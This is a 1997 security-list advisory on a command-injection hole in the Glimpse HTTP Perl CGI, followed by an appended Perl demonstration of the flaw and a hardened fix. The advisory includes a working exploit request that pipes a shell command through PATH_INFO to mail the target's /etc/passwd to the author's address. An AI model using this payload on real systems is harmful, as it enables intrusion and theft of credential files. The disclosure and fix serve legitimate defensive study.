Vulnerability in Glimpse HTTP

Razvan Dragomirescu (drazvan@kappa.ro)
Wed, 02 Jul 1997 19:32:09 +0300

Hi,

I'm back with another vulnerability, this time in a small utility: Glimpse
HTTP which is an interface to the Glimpse search tool. It is written in
PERL.

First my congratulations to the authors. They've done a really great job
in securing the program (really, I mean it). The hole I exploited is a
small one but it can allow you to execute any command on the remote
system (as the owner of the http server).

Allow me to quote from the source (I'm sure I have the latest version, I
downloaded it 1 hour ago :) ).

--begin--

$path_info = $ENV{'PATH_INFO'};
$_ = $path_info;

# /<length>/$indexdir/$path is the format of the PATH_INFO

# might as well start the message now
print "Content-type: text/html\n\n";
print "<HTML>\n";
print "<HEAD>\n";

if ( m|^/([0-9]*)(.*)$| ) {
    $length = $1;
    $path = $2;
    $path =~ s|"||g;
} else {
    &err_badargs;
}

$indexdir = substr($path,0,$length);
$relpath = substr($path,$length,length($path));

# print "<br>indexdir=$indexdir<br>relpath=$relpath<br>";

open(CONF,"$indexdir/archive.cfg") || &err_conf;

--end--

As you may see, it splits PATH_INFO into two fields: $length and
$path, and then takes the first $length characters from $path and puts them
in $indexdir (my phrasing is more twisted than my mind :) ).
The last line opens "$indexdir/archive.cfg".

Now for the evil part.
By setting $indexdir to a string that begins with '|', the system will
execute whatever it finds after the pipe, giving it as STDIN what you
write to the CONF handle.

The bad thing is that most HTTP servers won't let you use TABS or SPACES
in the PATH_INFO (not the case of Netscape servers anyway, but CERN and
Apache will do it). And I don't know how many "one word" commands anyone
can find (and make them do evil).

Here's where the famous IFS variable comes in handy.
If $indexdir is set to something like
"|IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo"
it will execute the command in CMD using IFS as separator. The one above
sends me your /etc/passwd (so you'd better change something there :) ).
The last "echo" is used to ignore the rest of the string. And of course you
can use any other separator instead of "5".

Now for the exploit.

telnet target.machine.com 80

GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo HTTP/1.0

Note that the cgi-bin directory could be located somewhere else (for
example in /scripts or /cgi or a special directory just for glimpse...).
Also note that you HAVE to use all those backslashes in the command (perl
wants them there!).

I would like (again) to have some feedback from those who have Glimpse
installed on their systems. It should work if the script has not been
modified.

I think that would be all.

Be good.
Razvan

--
Razvan Dragomirescu
drazvan@kappa.ro, drazvan@romania.ro, drazvan@roedu.net
Phone: +40-1-6866621
"Smile, tomorrow will be worse" (Murphy)
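The following is an added example, not code from the post or from Glimpse HTTP. It reproduces the PATH_INFO parsing quoted above, shows how Perl's two-argument open() turns a leading "|" in $indexdir into a shell command (using the IFS trick from the post with a harmless "echo" in place of "mail"), and puts a hardened version beside it. The subroutine names, the base-directory confinement and the character allow-list are this example's own choices; the aglimpse script itself is not part of the example and its err_* handlers are not reproduced.

```perl
#!/usr/bin/perl
# Added example, not the aglimpse code: the PATH_INFO handling quoted in the
# post, the two-argument open() that turns it into command execution, and a
# hardened replacement. Names (split_path_info, open_conf_*) and the
# base-directory confinement are this example's own assumptions.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Parse PATH_INFO the way the quoted script does: /<length><path>, with the
# first <length> characters of <path> taken as the index directory.
sub split_path_info {
    my ($path_info) = @_;
    return unless $path_info =~ m|^/([0-9]*)(.*)$|;
    my ($length, $path) = ($1, $2);
    $path =~ s|"||g;    # the only filtering the quoted script does
    return (substr($path, 0, $length), substr($path, $length));
}

# VULNERABLE: two-argument open() interprets the string. A leading '|' means
# "run this as a shell command and connect CONF to its STDIN", so whatever
# the client put in $indexdir after the '|' is executed by /bin/sh.
sub open_conf_vulnerable {
    my ($indexdir) = @_;
    open(CONF, "$indexdir/archive.cfg") or return 0;
    close(CONF);
    return 1;
}

# HARDENED: three-argument open() with an explicit '<' mode never interprets
# the file name, and the name itself is checked against an allow-list of
# characters, rejected if it contains '..', and confined under $base.
sub open_conf_hardened {
    my ($base, $indexdir) = @_;
    return 0 unless $indexdir =~ m{^[A-Za-z0-9_.-]+(?:/[A-Za-z0-9_.-]+)*$};
    return 0 if grep { $_ eq '..' } split m{/}, $indexdir;
    open(my $conf, '<', "$base/$indexdir/archive.cfg") or return 0;
    my @lines = <$conf>;
    close($conf);
    return scalar @lines;    # number of config lines read
}

# --- demonstration on a constructed index directory ----------------------
my $base = tempdir(CLEANUP => 1);
mkdir "$base/idx" or die "mkdir: $!";
open(my $fh, '>', "$base/idx/archive.cfg") or die "open: $!";
print $fh "Title: constructed archive\n";
close($fh);

# 1. A legitimate request: /<len>/<indexdir>/<relpath>, where <len> is the
#    length of the absolute index directory.
my $idx = "$base/idx";
my ($dir, $rel) = split_path_info('/' . length($idx) . "$idx/docs/a.html");
print "indexdir=$dir relpath=$rel\n";
print "vulnerable open of the real config: ", open_conf_vulnerable($dir), "\n";

# 2. The hostile request from the post, with IFS as the word separator
#    because many servers reject spaces in PATH_INFO. The shell receives
#    "IFS=5;CMD=5echo5pwned;eval$CMD;echo/archive.cfg": eval splits $CMD on
#    '5' and runs "echo pwned"; the trailing "echo/archive.cfg" is the
#    script's own suffix and fails harmlessly (command not found).
my $hostile = '|IFS=5;CMD=5echo5pwned;eval$CMD;echo';
($dir, $rel) = split_path_info('/' . length($hostile) . $hostile);
print "vulnerable open runs the injected command:\n";
open_conf_vulnerable($dir);    # the spawned shell prints "pwned"

# 3. The same two inputs against the hardened version: the relative name
#    "idx" is read; the pipe string is rejected before any open() happens.
print "hardened, good name: ", open_conf_hardened($base, 'idx'), " line(s)\n";
print "hardened, hostile  : ", open_conf_hardened($base, $hostile), "\n";
```

Two notes on the fix. Three-argument open() requires Perl 5.6 or later, so it was not available to the 1997 script; the allow-list check is what carries the weight on older interpreters. Running the CGI under taint mode (perl -T) would also have stopped this particular hole, since $ENV{'PATH_INFO'} is tainted and Perl refuses to open a pipe to a command built from a tainted string.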